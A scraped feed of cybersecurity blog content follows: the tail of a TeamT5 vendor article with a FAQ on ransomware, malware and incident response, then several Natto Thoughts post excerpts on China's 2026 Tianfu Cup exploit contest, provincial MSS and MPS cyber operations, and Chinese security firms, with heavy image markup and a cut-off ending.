Intelligence: Revealing Threats from the Hacker’s Perspective</a></li> <li><a href="https://teamt5.org/en/posts/outpace-ransomware-operators-with-threat-vision-cybercrime-intelligence/?utm_source=blog&utm_medium=website">Outpace Ransomware Operators with ThreatVision Cybercrime Intelligence</a></li> </ul> In the event of various cybersecurity incidents, consider seeking services from expert teams, such as incident response (IR) services. IR can assist enterprises in responding to and investigating cybersecurity incidents in a timely manner to help mitigate damage. Their assistance includes, but is not limited to, the following: <ul> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-ransomware-attack/?utm_source=blog&utm_medium=website">[Incident Response Case] Ransomware encryption comes to your door, how should you respond? </a></li> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-private-data-breach/?utm_source=blog&utm_medium=website">[Incident Response Case] When personal information is breached and exploited by hackers, how do enterprises deal with it?</a></li> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-advanced-persistent-threat-apt/?utm_source=blog&utm_medium=website">[Incident Response Case] When APT threats are lurking in the environment, how can you deal with them effectively? </a></li> </ul> However, enterprises need to carefully consider when selecting and procuring cybersecurity incident response services. We provide a <a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-incident-response-service-ir/?utm_source=blog&utm_medium=website">procurement guide</a> outlining five key points to consider. ##Conclusion In conclusion, because cybersecurity incidents occur so frequently, it’s wise for organizations to work with expert teams to strengthen their defenses. For instance, managed detection and response (MDR) services can significantly improve a company’s security posture by helping identify, analyze, and respond to threats more effectively. Read the following article to learn how businesses can choose MDR services to build comprehensive cybersecurity protection: <ul> <li><a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-managed-detection-and-response-mdr-solution/?utm_source=blog&utm_medium=website">MDR Service Resources Managed Detection and Response (MDR): Key Considerations for Procurement</a></li> </ul> <blockquote> TeamT5 consists of top cyber threat analysts. Leveraging our geographic and cultural advantages, we have the best understanding of cyber attackers in Asia Pacific. TeamT5 is frequently invited to share insights at top cybersecurity conferences. Our threat intelligence research expertise and solutions are recognized as the 2023-2024 Company of the Year Award in Taiwanese Threat Intelligence by Frost & Sullivan. Contact us: <a href="https://teamt5.org/en/contact-us/?utm_source=blog&utm_medium=website">link</a> </blockquote> ##FAQ ###Q: What are the common cybersecurity threats to enterprises in 2026? ###A: Common cybersecurity threats include: <ul> <li>Ransomware attacks</li> <li>Malware intrusion</li> <li>Phishing attacks</li> <li>Data breaches</li> </ul> These attack methods are still evolving rapidly in 2026, posing even greater risks. <blockquote> More info: <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=blog&utm_medium=website">[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide</a> </blockquote> ###Q: What is ransomware? How can enterprises prevent attacks and ransomware threats? ###A: Ransomware encrypts company data and demands a large ransom, often accompanied by data breaches. Enterprises can mitigate this risk through endpoint detection and response (EDR) and vulnerability patching. <blockquote> The award-winning endpoint detection and response solution, ThreatSonar Anti-Ransomware, is your ideal choice. <a href="https://teamt5.org/en/products/threatsonar-anti-ransomware/?utm_source=blog&utm_medium=website">Click to learn more.</a> </blockquote> ###Q: What is malware? What threats does it pose to enterprises? ###A: Malware is one of the most common cybersecurity threats to enterprises, encompassing various forms such as viruses, Trojans, spyware, and keystroke logging. Attackers often infiltrate corporate systems through phishing emails, malicious links, or infected files, causing leaks of confidential data, system compromise, or operational disruptions. With the proliferation of attack tools and AI technology, malware is easier to spread. Enterprises must strengthen endpoint protection, conduct continuous monitoring, and enhance employee awareness to mitigate the risks. <blockquote> Understanding how threat hunting can combat malware: <a href="https://teamt5.org/en/posts/5-benefits-of-threat-hunting-strategies-for-enterprises/?utm_source=blog&utm_medium=website">5 Benefits of Threat Hunting Strategies for Enterprises</a> </blockquote> ###Q: What is the dark web? What threats does it pose to enterprises? ###A: The dark web has become a primary channel for attackers to exchange malicious tools, sell leaked data, and plan criminal activities, posing a high level of cybersecurity risks to enterprises. Enterprises must take the potential impact of the dark web seriously and establish monitoring, detection, and protection mechanisms as early as possible to reduce risks such as credential theft, data breaches, and damage to brand reputation. <blockquote> More Information: <a href="https://teamt5.org/en/posts/real-cases-of-how-the-dark-web-has-affected-enterprises-and-how-they-could-have-prevented-it/?utm_source=blog&utm_medium=website">Real Cases of How the Dark Web Has Affected Enterprises and How They Could Have Prevented It</a> </blockquote> ###Q: What is cybercrime? What threats does it pose to enterprises? ###A: Cybercrime refers to illegal activities conducted using computers, the internet, or digital devices. Its targets are wide-ranging, potentially including individuals, enterprises, and even government agencies; the underlying motives are also quite diverse, ranging from financial gain and data theft to espionage and sabotage. <blockquote> More Information: <a href="https://teamt5.org/en/posts/what-is-cybercrime-and-how-can-organizations-defend-against-it/?utm_source=blog&utm_medium=website">What Is Cybercrime and How Can Organizations Defend Against It?</a> </blockquote> ###Q: What should I do when a cybersecurity incident occurs? ###A: After detecting a cybersecurity incident, the enterprise should further classify the incident; then, "incident containment" should be implemented to limit the impact of the cybersecurity incident and prevent further escalation. Depending on the type and severity of the incident, the following measures can be taken: <ul> <li>Isolate infected systems: Disconnect infected systems from the network to prevent the spread of malware.</li> <li>Block suspicious traffic: Use firewalls and intrusion prevention systems (IPS) to block suspicious network traffic.</li> <li>Disable affected services: Temporarily disable affected applications or services to reduce risk. Subsequently, the enterprise should conduct incident investigation, recovery, reporting, and analysis to improve its cybersecurity strategies and response plans.</li> </ul> <blockquote> For more detailed cybersecurity incident response procedures, please read our article “<a href="https://teamt5.org/en/posts/cybersecurity-incident-response-handling-from-basic-concepts-to-practical-handling/?utm_source=blog&utm_medium=website">Cybersecurity Incident Response: From Basic Concepts to Practice</a>”. </blockquote> ###Q: Which cybersecurity solutions should enterprises prioritize investing in in 2026? ###A: Suggested priority order: <ul> <li>Threat Intelligence</li> <li>Endpoint Detection and Response (EDR)</li> <li>Threat Hunting Tool</li> </ul> TeamT5 provides the above solutions and services. Welcome to learn more and contact us for a free trial - <a href="https://teamt5.org/en/posts/intelligence-driven-cyber-defense/?utm_source=blog&utm_medium=website">Solution Introduction</a>. <blockquote> TeamT5 consists of top cyber threat analysts. Leveraging our geographic and cultural advantages, we have the best understanding of cyber attackers in Asia Pacific. TeamT5 is frequently invited to share insights at top cybersecurity conferences. Our threat intelligence research expertise and solutions are recognized as the 2023-2024 Company of the Year Award in Taiwanese Threat Intelligence by Frost & Sullivan. Contact us: <a href="https://teamt5.org/en/contact-us/?utm_source=blog&utm_medium=website">link</a> </blockquote>
The Tianfu Cup Returns Under MPS Leadership as AI Takes Center Stage

Wed, 11 Feb 2026 14:02:47 -0000

After a two-year hiatus, the Tianfu Cup returns under MPS lead, combining AI-assisted vulnerability discovery and exploitation, a new competition track, and less transparency in vulnerability handling

The Tianfu Cup (天府杯), China’s premier exploit hacking competition,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> has returned to Chengdu, Sichuan Province, for its sixth edition, held from January 29 to 30, 2026. This time, under the organizational lead of China’s Ministry of Public Security (MPS), China’s domestic law-enforcement authority. Launched in 2018 after Chinese authorities <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/capture-the-red-flag-an-inside-look-into-chinas-hacking-contest-ecosystem/">barred</a> domestic researchers from participating in international exploit competitions, such as Canada’s Pwn2Own, the Tianfu Cup emerged as a domestic alternative for high-end vulnerability research and exploitation.<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5R9h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5R9h!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 424w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 848w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1272w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" width="1280" height="555" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":555,"width":1280,"resizeWidth":null,"bytes":687976,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":null,"isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5R9h!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 424w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 848w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1272w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" style="height:20px;width:20px" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">2026 Tianfu Cup homepage. Screenshot by the Natto Team, taken on January 31, 2026, of the Tianfu Cup 2026 website.</figcaption></figure></div>After skipping three editions in 2022, 2024, and 2025, the competition has now reappeared, although the reasons for this hiatus and revival remain unclear. The event was <a href="https://archive.ph/gwwpl">first announced </a>on China’s MPS website on January 16. On January 19, the Tianfu Cup’s account on the social media platform X appears to have briefly posted about the competition before deleting the post shortly thereafter. The following day, the event’s website (hxxps://tianfucup[.]cn) became inaccessible from outside China. By February 2, following the conclusion of the contest, the site appeared to have been taken offline entirely and remains inaccessible as of this writing. The Natto Team was nonetheless able to access the website for this piece, which includes screenshots of relevant information, as well as MPS and private company press releases that remain accessible.Building on earlier analyses of past Tianfu Cup events by the <a href="https://www.nattothoughts.com/p/tianfu-cup-2023-still-a-thing">Natto Team</a> and the <a href="https://css.ethz.ch/en/center/CSS-news/2024/06/from-vegas-to-chengdu-hacking-contests-bug-bounties-and-chinas-offensive-cyber-ecosystem.html">From Vegas to Chengdu report </a>from the Center for Security Studies at ETH Zurich, this piece examines what has changed with the Tianfu Cup’s return and why it matters. It analyzes the shift from a commercially led competition to one organized almost entirely by the MPS, specifically the Sichuan Provincial Public Security Bureau. It then looks at the structure of the 2026 edition and its two tracks, including evidence of AI-assisted techniques being used in vulnerability discovery and exploitation. Finally, it explores what remains the most consequential and unresolved question: where vulnerabilities discovered at the Tianfu Cup are likely to end up, and what this suggests about China’s evolving approach to vulnerability retention and state control.A complete list of competition targets, as disclosed on the 2026 Tianfu Cup website, is reproduced in the appendix at the end of this piece.<div class="subscription-widget-wrap-editor" data-attrs="{"url":"https://www.nattothoughts.com/subscribe?","text":"Subscribe","language":"en"}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble">Natto Thoughts is a reader-supported publication. To receive new posts and support the Natto Team’s work, consider becoming a free or paid subscriber.</div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email…" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div> <a href="https://www.nattothoughts.com/p/the-tianfu-cup-returns-under-mps"> Read more </a>
Provincial Tasking, Cross-Provincial Execution: A Case-Based Look at How China Scales Cyber Operations

Wed, 28 Jan 2026 15:02:08 -0000

How decentralized MSS and MPS tasking and market-enabled, cross-provincial execution by commercial firms shape the scale of China’s cyber operations

In a previous piece, we<a href="https://nattothoughts.substack.com/p/the-many-arms-of-the-mss-why-provincial"> argued</a> that provincial Ministry of State Security (MSS) bureaus function as key organizational nodes in China’s cyber operations – acting as operational nerve centers with their own internal priorities, resources, and institutional logics.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> But this decentralization does not mean that cyber operations are siloed at the provincial level.Disclosures from a 2024 leak, together with a March 2025 U.S. indictment involving Anxun (<a href="https://www.nattothoughts.com/p/i-soon-another-company-in-the-apt41">i-SOON</a>) Information Technology Co., Ltd (安洵信息技术有限公司), which has been linked to Chinese state-sponsored cyber campaigns, <a href="https://www.justice.gov/opa/pr/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global">indicate</a> that a single commercial actor can be tasked by, actively seek contract opportunities from, or perform work for, a large number of provincial MSS and Ministry of Public Security (MPS) bureaus. This case provides rare visibility into how a single firm can support multiple, distinct provincial mandates and supply the operational capacity through which intrusions are carried out at near-national scale.Building on this, this piece examines how companies allegedly linked to APT activity – concentrated in a small number of provinces – enable cross-provincial operational scaling, even as provincial bureaus remain the primary source of tasking and authority. It begins by briefly distinguishing legitimate businesses from front companies, then traces how earlier cyber operations were likely predominantly organized around provincially bounded, bureau-executed models centered on front companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> Next, it shows how market maturity enabled greater collaboration between government agencies and legitimate firms, and concludes by examining why these firms are concentrated in a handful of provinces.<div class="subscription-widget-wrap-editor" data-attrs="{"url":"https://www.nattothoughts.com/subscribe?","text":"Subscribe","language":"en"}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble">Natto Thoughts is a reader-supported publication. To receive new posts and support the Natto Team’s work, consider becoming a free or paid subscriber.</div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email…" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div> <a href="https://www.nattothoughts.com/p/provincial-tasking-cross-provincial"> Read more </a>
China’s 2025 Top 20 Cybersecurity Companies: Which “Dark Horses” Will Emerge to Prominence in 2026?

Wed, 14 Jan 2026 15:03:15 -0000

Annual ranking reveals hyper-competitive, innovation-focused top performers – some familiar and some not so well known, with extensive government ties

As we enter 2026, the geopolitical landscape appears more uncertain than ever. Ongoing conflicts, such as the Russia-Ukraine war, remain unresolved, while <a href="https://www.aei.org/articles/bracing-for-china-shock-2-0/">competition</a> among major world powers is intensifying. In such a climate, strength and capability are paramount. China’s cybersecurity industry <a href="https://web.archive.org/web/20251007173305/https:/www.ciids.cn/list_15/5033.html">recognizes</a> its special expertise as “the fundamental cornerstone for safeguarding national security.” Among the more than five thousand cybersecurity companies in China, which ones stand out as top providers of quality products and services, significantly contributing to China’s national security? The “2025 Top 20 Chinese Cybersecurity Enterprises (2025年中国网络安全前二十家企业)” list featured in the annual “China Internet Company Comprehensive Capability Index (CICCI) (中国互联网企业综合实力指数)” <a href="https://web.archive.org/web/20260108023343/https:/www.isc.org.cn/article/27470949623525376.html">report</a> published at the end of December 2025 by the <a href="https://web.archive.org/web/20250211023130/https:/www.isc.org.cn/article/15315.html">Internet Society of China</a> (ISC)—an industry association affiliated with the Chinese Ministry of Industry and Information Technology (MIIT)—offers a fresh perspective on the leading players in China’s cybersecurity industry as we begin our 2026 research focused on this sector.The Natto Team believes that understanding these Chinese cybersecurity companies is essential for grasping how China develops its cyber capabilities. Since launching Natto Thoughts in 2023, our team has investigated several Chinese cybersecurity companies involved in state-sponsored or state-linked cyber operations. Our <a href="https://nattothoughts.substack.com/p/a-look-back-at-the-top-5-natto-thoughts">findings</a> suggest that China has established a highly effective and state-aligned system, notably integrating the private sector—Chinese cybersecurity companies—in building its cyber capabilities.In this post, the Natto Team examines the overall development of China’s cybersecurity sector and the top cybersecurity companies of 2025 based on the ISC’s CICCI reports, which analyze these companies’ key performance indicators, innovation and research and development (R&D) capabilities, business and market coverage, and how their core functions align with China’s national priorities.<a class="button primary" href="https://www.nattothoughts.com/subscribe?">Subscribe now</a> <a href="https://www.nattothoughts.com/p/chinas-2025-top-20-cybersecurity"> Read more </a>
A Look Back at the Top 5 Natto Thoughts Reports in 2025

Tue, 06 Jan 2026 15:03:16 -0000

From attack–defense thinking to vulnerability research and exposed threat actors, we explored key aspects of China’s cyber ecosystem

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 424w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 848w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1272w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1456w" sizes="100vw"><img src="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080" width="4272" height="2848" data-attrs="{"src":"https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":2848,"width":4272,"resizeWidth":null,"bytes":null,"alt":"a pile of paper with a pen on top of it","title":null,"type":"image/jpg","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":null,"isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="a pile of paper with a pen on top of it" title="a pile of paper with a pen on top of it" srcset="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 424w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 848w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1272w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" style="height:20px;width:20px" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Photo by <a href="https://unsplash.com/@jessica45">Jessica G.</a> on <a href="https://unsplash.com">Unsplash</a></figcaption></figure></div>Natto Thoughts had a great year in 2025, experiencing strong growth in both readership and collaboration. The Natto Team would like to thank our readers for making our in-depth explorations of China’s evolving cyber ecosystem our most-viewed reports of the year. Your support drives our research. We also want to thank <span class="mention-wrap" data-attrs="{"name":"Eugenio Benincasa","id":5401290,"type":"user","url":null,"photo_url":"https://substack-post-media.s3.amazonaws.com/public/images/09a1f79e-07d1-4938-9147-e0df8440802f_800x800.jpeg","uuid":"db8822bb-c731-4687-94d5-77593bfe9a7a"}" data-component-name="MentionToDOM"> and <span class="mention-wrap" data-attrs="{"name":"Dakota Cary","id":88878145,"type":"user","url":null,"photo_url":"https://substack-post-media.s3.amazonaws.com/public/images/f14100c6-832f-4739-84c8-88b8137c5382_400x400.jpeg","uuid":"af4734c9-6d88-43d6-af03-db21b098d6dd"}" data-component-name="MentionToDOM"> for their research collaboration efforts. Three of the top five reports resulted from this partnership.Collectively, these five reports provide a comprehensive overview of how China has formally institutionalized its cyber capabilities, resulting in a highly effective and state-aligned system—particularly highlighting the integrated role of the private sector.Here are the highlights from the top 5 reports:<ul><li>“<a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from">Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry</a>“: This report demonstrated how the guiding philosophy, “To defend, one must first know how to attack” (以攻为防), originated in 1990…</li></ul> <a href="https://www.nattothoughts.com/p/a-look-back-at-the-top-5-natto-thoughts"> Read more </a>
The Many Arms of the MSS: Why Provincial Bureaus Matter in China’s Cyber Operations

Tue, 16 Dec 2025 17:01:34 -0000

Provincial bureaus of the Chinese Ministry of State Security likely operate with their own tasking priorities, resources, and local ecosystems for cyber operations

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6kZQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png" width="1024" height="1024" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":1024,"width":1024,"resizeWidth":null,"bytes":2518525,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/181387803?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 424w, 